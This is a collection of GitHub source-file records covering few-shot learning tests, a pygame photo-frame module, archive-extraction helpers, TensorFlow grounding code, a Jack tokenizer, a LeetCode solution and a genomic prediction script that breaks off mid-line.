+{"seq_id":"30740091360","text":"import pytest\nimport torch\nfrom torch import nn\n\nfrom easyfsl.datasets import SupportSetFolder\nfrom easyfsl.methods import MatchingNetworks\n\n\nclass TestMatchingNetworksInit:\n @staticmethod\n @pytest.mark.parametrize(\n \"backbone\",\n [\n nn.Conv2d(3, 4, 4),\n ],\n )\n def test_constructor_raises_error_when_arg_is_not_a_feature_extractor(backbone):\n with pytest.raises(ValueError):\n MatchingNetworks(backbone)\n\n\nclass TestMatchingNetworksPipeline:\n @staticmethod\n def test_matching_networks_returns_expected_output_for_example_images(\n example_few_shot_classification_task,\n ):\n (\n support_images,\n support_labels,\n query_images,\n ) = example_few_shot_classification_task\n\n torch.manual_seed(1)\n torch.set_num_threads(1)\n\n model = MatchingNetworks(nn.Flatten())\n\n model.process_support_set(support_images, support_labels)\n predictions = model(query_images)\n\n # pylint: disable=not-callable\n assert torch.all(\n torch.isclose(\n predictions,\n torch.tensor([[-1.3137, -0.3131], [-1.0779, -0.4160]]),\n atol=1e-01,\n )\n )\n # pylint: enable=not-callable\n\n\nclass TestMatchingNetsCanProcessSupportSetFolder:\n @staticmethod\n @pytest.mark.parametrize(\n \"support_set_path\",\n [\n \"easyfsl/tests/datasets/resources/balanced_support_set\",\n \"easyfsl/tests/datasets/resources/unbalanced_support_set\",\n ],\n )\n def test_matching_nets_can_process_support_set(support_set_path, dummy_network):\n support_set = SupportSetFolder(support_set_path)\n support_images = support_set.get_images()\n support_labels = support_set.get_labels()\n\n model = MatchingNetworks(backbone=dummy_network)\n model.process_support_set(support_images, support_labels)\n\n query_images = torch.randn((4, 3, 224, 224))\n model(query_images)\n","repo_name":"yylixianji/current-based-tool-wear-detection-with-FSL-and-TL","sub_path":"easy-few-shot-learning-master/easyfsl/tests/methods/matching_networks_test.py","file_name":"matching_networks_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"15548550393","text":"import pygame\nimport exifread\nimport os\nimport urllib.request\nfrom settings import * \nfrom PIL import Image\n# import heicTojpg as h2jpg\n\nclass ImageLib():\n def __init__(self, api):\n \"\"\"\n Loads images from online path or from alternative offline path\n \"\"\"\n self._onlinePath = \"Img/\"\n self._offlinePath = \"ImgOffline/\"\n #self._path = path\n self._api = api\n self._images = []\n self._currentIndex = -1\n self._image = None\n \n \n def getNextImage(self):\n \"\"\"Updates image to the next one\"\"\"\n self._images = self._api.updateImageNames()\n \n # Get index from local txt file. \n # This ensures that the image queue does not reset if the Pola restarts.\n try: \n f = open(\"memoryIndex.txt\", 'r')\n self._currentIndex = int((f.read()))\n f.close()\n except: \n self._currentIndex = -1\n \n self._currentIndex = (self._currentIndex + 1) % len(self._images)\n \n f = open(\"memoryIndex.txt\", 'w')\n f.write(str(self._currentIndex))\n f.close()\n \n \n # If there is an internet connection, go online. If not, get the \"no wifi error\"- image queue\n try:\n urllib.request.urlopen('http://torabodin.com/')\n try: \n imageName = self._api.downloadImage(self._currentIndex)\n print(1, imageName)\n self._image= self.loadImage(imageName, True)\n print (self._image)\n \n except: \n self._image = self.getNextImage()\n \n except:\n self._image = self.loadImage(None, False)\n \n \n return self._image\n \n def loadImage(self, name, online):\n if online: \n image = self._onlinePath + name\n \n else:\n image = self._offlinePath + str(self._currentIndex % 3) + \".jpeg\"\n \n \"\"\"\n Converting HEIF and HEIC images does not work at the moment. \n If they are present, they will be downloaded and then just ignored, as python cannot open them. \n \"\"\"\n #image = h2jpg.convert(image, None, 100) \n \n pygameImage = Img(image)\n pygameImage.offline = not online\n return pygameImage\n \n \nclass Img():\n \"\"\"Image class. Loads pygame image from image filename\"\"\"\n\n def __init__(self, filename):\n print(2, filename)\n self._name = filename\n self.x = 0\n self.y = 0\n self._image = pygame.image.load(self._name)\n self.offline = True\n \n \n self.rotate()\n self.scaleZoomed(720, 720)\n self.positionZoomed()\n \n def delete(self):\n \"\"\"Used to delete image after it has been displayed, \n so that we do not accidentally fill up our PI memory with old photos. \n Do note that images that are not showed (ex. heic images) will not be deleted either at the moment. \"\"\"\n os.system(\"rm \"+self._name) \n\n def rotate(self):\n \"\"\"Rotate image based on exif tags (if any) \"\"\"\n val = None\n try:\n \"\"\"Get rotation tags\"\"\"\n f = open(self._name, 'rb')\n tags = exifread.process_file(f)\n f.close()\n orientation = tags[\"Image Orientation\"]\n val = orientation.values\n\n except:\n return True\n\n if 3 in val:\n rotation = 180\n\n elif 6 in val:\n rotation = 270\n\n elif 8 in val:\n rotation = 90\n\n else:\n rotation = 0\n\n self._image = pygame.transform.rotate(self._image, rotation)\n\n def scaleZoomed(self, bx, by):\n \"\"\"Scales the image so that it will fill the entire screen. \n Image will be cropped if neccessary\"\"\"\n ix, iy = self._image.get_size()\n if ix > iy:\n # fit to width\n scale = bx/float(iy)\n sy = scale * ix\n if sy > by:\n scale = by/float(iy)\n sx = scale * ix\n sy = by\n else:\n sx = bx\n else:\n # fit to height\n scale = by/float(ix)\n sx = scale * iy\n if sx > bx:\n scale = bx/float(ix)\n sx = bx\n sy = scale * iy\n else:\n sy = by\n\n self._image = pygame.transform.scale(self._image, (int(sx), int(sy)))\n \n def positionZoomed(self):\n \"\"\"Positions image so that the middle-part of the image will be shown.\n Image will be cropped if neccessary\"\"\"\n rect_size = self._image.get_rect()\n\n if rect_size.width > 720:\n self.x = (int((720 - rect_size.width ) / 2))\n\n if rect_size.height > 720:\n self.y = (int((720 - rect_size.height) / 2))\n\n \n def getImage(self):\n \"\"\"returns image object\"\"\"\n return self._image\n \n \"\"\"\n The functions that are commented out can be used to display the entire image without cropping it. \n This version will provide black borders if the image is not square. \n \"\"\"\n \n #def scaleFull(self, bx, by):\n #\"\"\" Scales image to fit into the frame.\n #This method will retain the original image's aspect ratio \n #Black borders will be shown on sides/top/bottom when neccessary\"\"\"\n #ix, iy = self._image.get_size()\n #if ix > iy:\n ## fit to width\n #scale_factor = bx/float(ix)\n #sy = scale_factor * iy\n #if sy > by:\n #scale_factor = by/float(iy)\n #sx = scale_factor * ix\n #sy = by\n #else:\n #sx = bx\n #else:\n ## fit to height\n #scale_factor = by/float(iy)\n #sx = scale_factor * ix\n #if sx > bx:\n #scale_factor = bx/float(ix)\n #sx = bx\n #sy = scale_factor * iy\n #else:\n #sy = by\n\n #self._image = pygame.transform.scale(self._image, (int(sx), int(sy)))\n\n \n #def positionFull(self):\n #\"\"\"Positions scaled image in center of screen. \n #Black borders will be shown on sides/top/bottom when neccessary\"\"\"\n #rect_size = self._image.get_rect()\n\n #if rect_size.width < 720:\n #self.x = abs(int((rect_size.width - 720) / 2))\n\n #if rect_size.height < 720:\n #self.y = abs(int((rect_size.height - 720) / 2))\n\n #print(\"X and Y position: \", self.x, self.y)\n\n\nclass Fader():\n \"\"\"The\"fader film\" that goes on top of the image to change opacity\"\"\"\n\n def __init__(self, x, y):\n self._film = pygame.Surface((x, y))\n self._alpha = None\n self.setAlpha(0)\n\n def getFader(self):\n \"\"\"returns fader object\"\"\"\n return self._film\n\n def setAlpha(self, alpha):\n \"\"\"set fade opacity\"\"\"\n self._alpha = alpha\n self._film.set_alpha(self._alpha)\n","repo_name":"ToraBodin/Pola2.0","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3308668320","text":"from llama_index import VectorStoreIndex, SimpleDirectoryReader\nfrom llama_index import StorageContext, load_index_from_storage\n\nimport logging\nimport sys\nimport openai \nimport os\n\nfrom typing import List\nfrom pydantic import BaseModel\n\nclass Biography(BaseModel):\n \"\"\"Data model for a biography.\"\"\"\n\n name: str\n best_known_for: List[str]\n extra_info: str\n\ndef enable_debug():\n openai.log = \"debug\"\n\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n logging.getLogger().addHandler(logging.StreamHandler(stream=sys.stdout))\n\ndef get_index():\n #documents = SimpleDirectoryReader('data').load_data()\n pss_data = \"/root/llm_exam/llama_index/examples/paul_graham_essay/pss\"\n if not os.path.isdir(pss_data):\n raw_data = \"/root/llm_exam/llama_index/examples/paul_graham_essay/data\"\n documents = SimpleDirectoryReader(raw_data).load_data()\n index = VectorStoreIndex.from_documents(documents)\n index.storage_context.persist(persist_dir=pss_data)\n\n # rebuild storage context\n storage_context = StorageContext.from_defaults(persist_dir=pss_data)\n # load index\n index = load_index_from_storage(storage_context)\n return index \n\n\nif __name__ == \"__main__\":\n enable_debug()\n index = get_index()\n\n # query_engine = index.as_query_engine()\n # response = query_engine.query(\"What did the author do growing up?\")\n # print()\n # print(response)\n # print()\n\n #query_engine = index.as_query_engine(response_mode=\"tree_summarize\", output_cls=Biography)\n #query_engine = index.as_query_engine(output_cls=Biography)\n query_engine = index.as_query_engine(output_cls=Biography, response_mode=\"compact\")\n\n response = query_engine.query(\"Who is Paul Graham?\")\n\n print(response)\n #print(response.name)\n #print(response.best_known_for)\n #print(response.extra_info)\n","repo_name":"ethan-jiang-1/llm_exam","sub_path":"exam_li_intro/ex1_chat_engine_structure.py","file_name":"ex1_chat_engine_structure.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"15287025985","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Function comb\n# \n# ## Synopse\n# \n# Create a grid of impulses image.\n# \n# - **g = comb(shape, delta, offset)**\n# \n# - **g**: Image. \n# \n# \n# - **shape**: Image. output image dimensions (1-D, 2-D or 3-D).\n# - **delta**: Image. interval between the impulses in each dimension (1-D, 2-D or 3-D).\n# - **offset**: Image. offset in each dimension (1-D, 2-D or 3-D).\n\n# In[1]:\n\n\nimport numpy as np\ndef comb(shape, delta, offset):\n\n shape = np.array(shape)\n assert shape.size <= 3\n g = np.zeros(shape) \n if shape.size == 1:\n g[offset::delta] = 1\n elif shape.size == 2:\n g[offset[0]::delta[0], offset[1]::delta[1]] = 1\n elif shape.size == 3:\n g[offset[0]::delta[0], offset[1]::delta[1], offset[2]::delta[2]] = 1\n return g\n\n\n# ## Examples\n\n# In[1]:\n\n\ntesting = (__name__ == \"__main__\")\nif testing:\n get_ipython().system(' jupyter nbconvert --to python comb.ipynb')\n import numpy as np\n import sys,os\n import matplotlib.image as mpimg\n ia898path = os.path.abspath('../../')\n if ia898path not in sys.path:\n sys.path.append(ia898path)\n import ia898.src as ia\n\n\n# ### Example 1\n\n# In[2]:\n\n\nif testing:\n u1 = ia.comb(10, 3, 2)\n print('u1=',u1)\n u2 = ia.comb((10,), 3, 2)\n print('u2=',u2)\n\n\n# ### Example 2\n\n# In[3]:\n\n\nif testing:\n u3 = ia.comb((7,9), (1,2), (0,1))\n print('u3=\\n',u3)\n\n\n# ### Example 3\n\n# In[4]:\n\n\nif testing:\n u4 = ia.comb((4,5,9), (2,1,2), (1,0,1))\n print(u4)\n\n\n# ## Equation\n# \n# One dimension:\n# \n# $$ \\begin{matrix} u(x)=\\sum _{i=0}^{\\infty}\\delta \\left( x-\\left( ki+o\\right) \\right)\\\\\n# x\\in [0,S_0-1]\n# \\end{matrix}\n# $$\n\n# $$\\begin{matrix}\n# where\\quad \\delta (i)=\\left\\{ \\begin{array}{ll}\n# 1, & i=0\\\\\n# 0, & otherwise\n# \\end{array}\\right.\n# \\end{matrix}\n# $$\n\n# N-dimension:\n# \n# $$\n# \\begin{matrix}\n# u\\left( x_{0},x_{1},\\cdots ,x_{N-1}\\right) =\\sum _{i_{0}=0}^{\\infty}\\sum _{i_{1}=0}^{\\infty}\\cdots \\sum _{i_{N-1}=0}^{\\infty}\\delta \\left( x_{0}-\\left( k_{0}i_{0}+o_{0}\\right) ,x_{1}-\\left( k_{1}i_{1}+o_{1}\\right) ,\\cdots ,x_{N-1}-\\left(k_{N-1}i_{N-1}+o_{N-1}\\right) \\right)\\\\\n# \\left( x_{0},x_{1},\\cdots ,x_{N-1}\\right) \\in \\left[ \\left( 0,0,\\cdots ,0\\right) ,\\left( S_{0}-1,S_{1}-1,\\cdots ,S_{N-1}-1\\right) \\right]\n# \\end{matrix} $$\n\n# $$\\begin{matrix}\n# where\\quad \\delta (i_0,i_1,\\ldots,i_{N-1})=\\left\\{ \\begin{array}{ll}\n# 1, & i_0=i_1=i_2=\\ldots=i_{N-1}=0\\\\\n# 0, & otherwise\n# \\end{array}\\right.\n# \\end{matrix}\n# $$\n\n# In[5]:\n\n\nif testing:\n print('testing comb')\n print(repr(ia.comb(10, 3, 2)) == repr(np.array(\n [0., 0., 1., 0., 0., 1., 0., 0., 1., 0.])))\n print(repr(ia.comb((7,9), (3,4), (3,2))) == repr(np.array(\n [[0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 1., 0., 0., 0., 1., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 1., 0., 0., 0., 1., 0., 0.]])))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"gui88Abreu/IA898-DigitalImageProcessing","sub_path":"src/comb.py","file_name":"comb.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"19140891970","text":"import rarfile\nimport yaml\nimport gzip\nimport tarfile\nimport os\nimport zipfile\n\n'''\nglobal param\n'''\nconfig_yaml = './config/config.yaml'\n\n\n'''\ndecompressing files\n'''\ndef ungz(filename):\n filename = filename[:-3] # gz文件的单文件解压就是去掉 filename 后面的 .gz\n gz_file = gzip.GzipFile(filename)\n with open(filename, \"w+\") as file:\n file.write(gz_file.read())\n return filename # 这个gzip的函数需要返回值以进一步配合untar函数\n\ndef untar(filename):\n tar = tarfile.open(filename)\n names = tar.getnames()\n # tar本身是将文件打包,解除打包会产生很多文件,因此需要建立文件夹存放\n if not os.path.isdir(filename + \"_dir\"):\n os.mkdir(filename + \"_dir\")\n for name in names:\n tar.extract(name, filename + \"_dir/\")\n tar.close()\n\ndef unzip(filename):\n zip_file = zipfile.ZipFile(filename)\n # 类似tar解除打包,建立文件夹存放解压的多个文件\n if not os.path.isdir(filename + \"_dir\"):\n os.mkdir(filename + \"_dir\") \n for names in zip_file.namelist():\n if not str(names).startswith('__MACOSX/'):\n zip_file.extract(names, filename + \"_dir/\")\n zip_file.close()\n \n\n\ndef unrar(filename):\n rar = rarfile.RarFile(filename)\n if not os.path.isdir(filename + \"_dir\"):\n os.mkdir(filename + \"_dir\")\n os.chdir(filename + \"_dir\")\n rar.extractall()\n rar.close()\n\ndef decompress(filename_list):\n foldername_list = []\n for filename in filename_list:\n if '.' in filename:\n suffix = filename.split('.')[-1]\n if suffix == 'gz':\n new_filename = ungz(filename)\n os.remove(filename)\n if new_filename.split('.')[-1] == 'tar':\n untar(new_filename)\n os.remove(new_filename) \n if suffix == 'tar':\n untar(filename)\n os.remove(filename)\n if suffix == 'zip':\n unzip(filename)\n os.remove(filename)\n if suffix == 'rar':\n unrar(filename)\n os.remove(filename)\n foldername_list.append(filename+'_dir')\n return foldername_list\n\n# \ndef get_files_from_folder_with_suffix(folder_list, accept_suffix):\n \n data_files = []\n for folder in folder_list:\n for path, dir_list, file_list in os.walk(folder):\n for file in file_list:\n if os.path.splitext(file)[-1] in accept_suffix:\n data_files.append(os.path.join(path, file))\n \n return data_files\n\ndef get_config():\n f = open(config_yaml, 'r', encoding='utf-8')\n cfg = f.read()\n print(cfg)\n\n config = yaml.load(cfg,Loader=yaml.FullLoader) # 用load方法转字典\n print(config)\n return config\n\n","repo_name":"CharlieSong1999/Demo","sub_path":"Back-End/utilies.py","file_name":"utilies.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37460437567","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import logging\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom protos import model_pb2\nfrom modeling.utils import masked_ops\nfrom modeling.utils import box_ops\nfrom models.cap2sg_data import DataTuple\n\n\ndef detect_entities(options, dt):\n \"\"\"Grounds entities.\n\n Args:\n options: A Cap2SGDetection proto.\n dt: A DataTuple object, served as a collection of global variables.\n\n Returns:\n dt.detection.valid_detections: Number of detections, [batch].\n dt.detection.nmsed_boxes: Detection boxes, [batch, max_n_detection, 4].\n dt.detection.nmsed_scores: Detection scores, [batch, max_n_detection],\n dt.detection.nmsed_classes: Detection classes, [batch, max_n_detection],\n dt.detection.nmsed_attribute_scores: Object attribute scores, [batch, max_n_detection].\n dt.detection.nmsed_attribute_classes: Object attribute class, [batch_max_n_detection].\n dt.refined_grounding.entity_proposal_id: Grounding vector, the ``g'' vector in our paper, [batch, max_n_entity].\n dt.refined_grounding.entity_proposal_box: Grounded boxes, [batch, max_n_entity, 4],\n dt.refined_grounding.entity_proposal_score: Grounding scores, [batch, max_n_entity]\n dt.refined_grounding.entity_proposal_feature: Grounded features, [batch, max_n_entity, vdims]\n \"\"\"\n if not isinstance(options, model_pb2.Cap2SGDetection):\n raise ValueError('Options has to be a Cap2SGDetection proto.')\n\n if not isinstance(dt, DataTuple):\n raise ValueError('Invalid DataTuple object.')\n\n # Compute proposal iou.\n propogation_matrix = tf.cast(\n dt.proposal_iou > options.grounding_iou_threshold, tf.float32)\n\n # Compute detection labels.\n dt.detection_instance_labels_list = []\n dt.detection_instance_logits_list = []\n dt.detection_instance_scores_list = []\n\n entity_proposal_id = dt.grounding.entity_proposal_id\n for itno in range(options.num_iterations):\n detection_instance_labels = _scatter_entity_labels(\n proposal_id=entity_proposal_id,\n entity_id=dt.entity_ids,\n max_n_proposal=dt.max_n_proposal,\n vocab_size=dt.vocab_size)\n detection_instance_labels = tf.matmul(propogation_matrix,\n detection_instance_labels)\n dt.detection_instance_labels_list.append(detection_instance_labels)\n\n # Predict detection scores.\n detection_head = tf.layers.Dense(dt.dims,\n kernel_initializer=tf.keras.initializers.RandomNormal(\n mean=0.0, stddev=0.01),\n name='entity_detection_head_%i' % itno)(\n dt.proposal_features)\n (detection_instance_logits,\n detection_instance_scores) = _box_classify(detection_head, dt.embeddings,\n dt.bias_entity)\n dt.detection_instance_logits_list.append(detection_instance_logits)\n dt.detection_instance_scores_list.append(detection_instance_scores)\n\n # Update the proposal id associated to the image-level entity label.\n # I.e., update the ``g'' vector in the paper.\n dummy_attention = tf.gather_nd(tf.transpose(detection_instance_scores,\n [0, 2, 1]),\n indices=_get_full_indices(dt.entity_ids))\n entity_proposal_id = tf.math.argmax(dummy_attention,\n axis=2,\n output_type=tf.int32)\n # Compute attribute labels.\n if options.predict_attributes:\n dt.attribute_instance_labels = _scatter_attribute_labels(\n dt.grounding.entity_proposal_id, dt.per_ent_att_ids, dt.max_n_proposal,\n dt.vocab_size)\n attribute_head = tf.layers.Dense(dt.dims,\n kernel_initializer=tf.keras.initializers.RandomNormal(\n mean=0.0, stddev=0.01),\n name='attribute_detection_head')(\n dt.proposal_features)\n (dt.attribute_instance_logits,\n dt.attribute_instance_scores) = _box_classify(attribute_head,\n dt.embeddings,\n dt.bias_attribute)\n\n # Save the grounding results.\n dt.refined_grounding.entity_proposal_id = entity_proposal_id\n dt.refined_grounding.entity_proposal_score = tf.reduce_max(\n dummy_attention, 2)\n\n indices = _get_full_indices(entity_proposal_id)\n dt.refined_grounding.entity_proposal_box = tf.gather_nd(\n dt.proposals, indices)\n dt.refined_grounding.entity_proposal_feature = tf.gather_nd(\n dt.proposal_features, indices)\n\n # Postprocess: non-maximum-suppression.\n post_process = options.post_process\n (dt.detection.nmsed_boxes, dt.detection.nmsed_scores,\n dt.detection.nmsed_classes,\n dt.detection.valid_detections) = tf.image.combined_non_max_suppression(\n tf.expand_dims(dt.proposals, 2),\n detection_instance_scores[:, :, 1:],\n max_output_size_per_class=post_process.max_size_per_class,\n max_total_size=post_process.max_total_size,\n iou_threshold=post_process.iou_thresh,\n score_threshold=post_process.score_thresh)\n dt.detection.nmsed_classes = tf.cast(\n 1 + dt.detection.nmsed_classes, tf.int32)\n\n # Get the proposal id of the detection box, then fetch the other information.\n iou = _compute_iou(dt.detection.valid_detections, dt.detection.nmsed_boxes,\n dt.n_proposal, dt.proposals)\n dt.detection.nmsed_proposal_id = tf.math.argmax(iou,\n axis=2,\n output_type=tf.int32)\n indices = _get_full_indices(dt.detection.nmsed_proposal_id)\n dt.detection.nmsed_features = tf.gather_nd(dt.proposal_features, indices)\n # nmsed_attribute = tf.gather_nd(dt.attribute_instance_scores, indices)\n # dt.detection.nmsed_attribute_scores = tf.reduce_max(nmsed_attribute, -1)\n # dt.detection.nmsed_attribute_classes = tf.argmax(nmsed_attribute,\n # axis=2,\n # output_type=tf.int32)\n\n return dt\n\n\ndef _get_full_indices(index):\n \"\"\"Gets full indices from a single index.\n\n Args:\n index: A single index, a [batch, max_n_elem] int tensor.\n\n Returns:\n indices: Full indices with batch dimension added.\n \"\"\"\n batch, max_n_elem = index.shape[0].value, index.shape[1].value\n if max_n_elem is None:\n max_n_elem = tf.shape(index)[1]\n\n batch_index = tf.broadcast_to(tf.expand_dims(tf.range(batch), 1),\n [batch, max_n_elem])\n return tf.stack([batch_index, index], -1)\n\n\ndef _box_classify(detection_head, embeddings, bias, normalize_fn=tf.nn.softmax):\n \"\"\"Predicts classes based on the detection head.\n\n Args:\n detection_head: A [batch, max_n_proposal, dims] float tensor.\n embeddings: Embedding matrix, a [vocab_size, dims] float tensor.\n bias: A [vocab_size] float tensor.\n normalize_fn: Function to normalize scores.\n\n Returns:\n detection_logits: Logits tensor, a [batch, max_n_proposal, vocab_size] \n float tensor.\n detection_scores: Normalized scores, a [batch, max_n_proposal, vocab_size] \n float tensor.\n \"\"\"\n detection_logits = tf.matmul(detection_head, embeddings, transpose_b=True)\n detection_logits = tf.nn.bias_add(detection_logits, bias)\n detection_scores = normalize_fn(detection_logits)\n\n # Set background scores to zeros; note the logits still contain background.\n batch = detection_head.shape[0].value\n max_n_proposal = tf.shape(detection_head)[1]\n detection_scores = tf.concat(\n [tf.zeros([batch, max_n_proposal, 1]), detection_scores[:, :, 1:]], -1)\n return detection_logits, detection_scores\n\n\ndef _compute_iou(n_box1, box1, n_box2, box2):\n \"\"\"Computes the IoU between two sets of boxes.\n\n Args:\n n_box1: A [batch] int tensor.\n box1: A [batch, max_n_box1, 4] float tensor.\n n_box2: A [batch] int tensor.\n box2: A [batch, max_n_box2, 4] float tensor.\n\n Returns:\n iou: A [batch, max_n_box1, max_n_box2] float tensor.\n \"\"\"\n mask1 = tf.sequence_mask(n_box1, maxlen=tf.shape(box1)[1], dtype=tf.float32)\n mask2 = tf.sequence_mask(n_box2, maxlen=tf.shape(box2)[1], dtype=tf.float32)\n mask = tf.multiply(tf.expand_dims(mask1, 2), tf.expand_dims(mask2, 1))\n\n iou = box_ops.iou(tf.expand_dims(box1, 2), tf.expand_dims(box2, 1))\n return tf.multiply(iou, mask)\n\n\ndef _scatter_entity_labels(proposal_id, entity_id, max_n_proposal, vocab_size):\n \"\"\"Creates entity labels from pseudo instances.\n\n Args:\n proposal_id: A [batch, max_n_node] int tensor, denoting the proposal index.\n entity_id: A [batch, max_n_node] int tensor, values are in [0, vocab_size).\n max_n_proposal: Maximum number of proposals.\n vocab_size: Size of the vocabulary.\n\n Returns:\n A [batch, max_n_proposal, vocab_size] tensor.\n \"\"\"\n batch = proposal_id.shape[0].value\n max_n_node = tf.shape(entity_id)[1]\n\n index_batch = tf.broadcast_to(tf.expand_dims(tf.range(batch), 1),\n [batch, max_n_node])\n index_full = tf.stack([index_batch, proposal_id, entity_id], -1)\n return tf.scatter_nd(index_full,\n updates=tf.fill([batch, max_n_node], 1.0),\n shape=[batch, max_n_proposal, vocab_size])\n\n\ndef _scatter_attribute_labels(proposal_id, attribute_id, max_n_proposal,\n vocab_size):\n \"\"\"Create attribute labels from pseudo instances.\n\n Args:\n proposal_id: A [batch, max_n_node] int tensor, denoting the proposal index.\n attribute_id: A [batch, max_n_node, max_n_attribute] int tensor, values are in [0, vocab_size).\n max_n_proposal: Maximum number of proposals.\n vocab_size: Size of the vocabulary.\n\n Returns:\n A [batch, max_n_proposal, vocab_size] tensor.\n \"\"\"\n batch = proposal_id.shape[0].value\n max_n_node = tf.shape(proposal_id)[1]\n\n attribute_labels = tf.reduce_max(tf.one_hot(attribute_id, depth=vocab_size),\n 2)\n attribute_labels = tf.concat(\n [tf.zeros([batch, max_n_node, 1]), attribute_labels[:, :, 1:]], -1)\n index_batch = tf.broadcast_to(tf.expand_dims(tf.range(batch), 1),\n [batch, max_n_node])\n return tf.scatter_nd(tf.stack([index_batch, proposal_id], -1),\n updates=attribute_labels,\n shape=[batch, max_n_proposal, vocab_size])\n","repo_name":"yekeren/WSSGG","sub_path":"models/cap2sg_detection.py","file_name":"cap2sg_detection.py","file_ext":"py","file_size_in_byte":10630,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"}
+{"seq_id":"4334283","text":"import sys\nimport re\nimport parser\n\nkeyword = ['class', 'constructor', 'function', 'method', \n 'field', 'static', 'var', 'int', 'char', 'boolean',\n 'void', 'true', 'false', 'null', 'this', 'let', 'do',\n 'if', 'else', 'while', 'return']\nsymbol = ['{', '}', '(', ')', '[', ']', '.', ',', ';', '+', '-', '*', '/', '&', '|', '<', '>', '=', '~' ]\ntoken_list_count = 0\nfinal_list = []\npgm_list = []\n\ndef next_token_temp():\n global token_list_count\n tkn = pgm_list[token_list_count]\n token = (tkn, token_type(tkn))\n return token\n\ndef next_token():\n global token_list_count\n token = pgm_list[token_list_count]\n token_list_count += 1\n token = (token, token_type(token))\n return token\n \ndef token_type(token):\n for ch in keyword:\n if ch == token:\n return 'keyword'\n for ch in symbol:\n if ch == token:\n #if token == '<':\n #print_token('<', 'symbol')\n return 'symbol'\n #else:\n #print_token(token, 'symbol')\n #return\n if token.isdigit():\n return 'integerConstant'\n if token.isalpha() or token[0] == '_' or token.isalnum():\n return 'identifier'\n else:\n return 'stringConstant'\n\ndef final_list_preparation(val):\n list2 = []\n string_l = []\n string_constant = \"\"\n i = -1\n for value in val:\n if value == '\\r':\n continue\n else:\n if value == \"\\\"\" and i!=0:\n i=0\n continue\n if i == 0 and value == \"\\\"\":\n i = 2\n pgm_list.append(string_constant)\n string_constant = ''\n continue\n if i == 0:\n string_constant = string_constant + ' ' + value\n continue\n else:\n pgm_list.append(value)\n\ndef tokanizer(file_path):\n f = open(file_path, 'r')\n lines = f.readlines()\n for ch in lines:\n final_list.append(re.findall(\"\\s*(\\d+|\\w+|.)\", ch))\n for ch in final_list:\n final_list_preparation(ch)\n\t\t\n\n","repo_name":"anoopvalluthadam/The_Elements_of_Computing_System","sub_path":"ST10/tokanizer.py","file_name":"tokanizer.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"25491995593","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/stickers-to-spell-word/\n# Author: Miao Zhang\n# Date: 2021-03-02\n\nclass Solution:\n def minStickers(self, stickers: List[str], target: str) -> int:\n cnt = collections.Counter(target)\n st = [collections.Counter(s) & cnt for s in stickers]\n for i in range(len(st) - 1, -1, -1):\n if any(st[i] & st[i] == st[j] for j in range(len(st)) if i != j):\n st.pop(i)\n stickers = [''.join(s.elements()) for s in st]\n print(stickers)\n\n dp = [-1] * (1 << len(target))\n dp[0] = 0\n for state in range(1 << len(target)):\n if dp[state] == -1: continue\n for sticker in stickers:\n now = state\n for s in sticker:\n for i, c in enumerate(target):\n if (now >> i) & 1: continue\n if c == s:\n now |= 1 << i\n break\n if dp[now] == -1 or dp[now] > dp[state] + 1:\n dp[now] = dp[state] + 1\n return dp[-1]\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/stickerstoSpellWord/stickerstoSpellWord.py","file_name":"stickerstoSpellWord.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"18020603898","text":"##Trait prediction using different genomic similarity matrices\n\n#For testing different GSMs\nimport sys\n#import limix.vardec.vardec as va \nimport scipy.linalg as LA\nfrom sklearn.linear_model import Lasso\nimport numpy as np \nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import KFold \nimport gc\nimport scipy as sp\nimport os\nimport csv\nimport time\nimport pandas as pd\nimport scipy.stats\n\n#load plantings names\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/Clim_GWAS_2\")\nplantings=np.load(\"Plantings_NEW.npy\")\n\nK=np.load(\"K_MATRIX_LIMIX.npy\") #or preferred GSM\n\n#load genetic data\nsnps=np.load('SNPs_0.1.npy') \n\n#load phenotype either DTB_NEW or SeedNum (SP)\ny=np.load(\"DTB_NEW.npy\")\n\n#load environmental data and get only min/max temperature\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/Microclim\")\nenv=pd.read_csv('Microclimate_minmaxDaily_threshold_0_0.csv',sep=',') \nlogical=env.columns.str.startswith(('PAR','TT','PTT','daylength') ) #remove predictors besides min/max temp.\nenv=env.iloc[:,~logical] \nenvironment=np.array(env)\n#combine to create fixed effect predictors\nX=np.concatenate((snps,environment),axis=1)\n\n\n\n#Running LMMLASSO\n#Defining model parameters\nalphas = 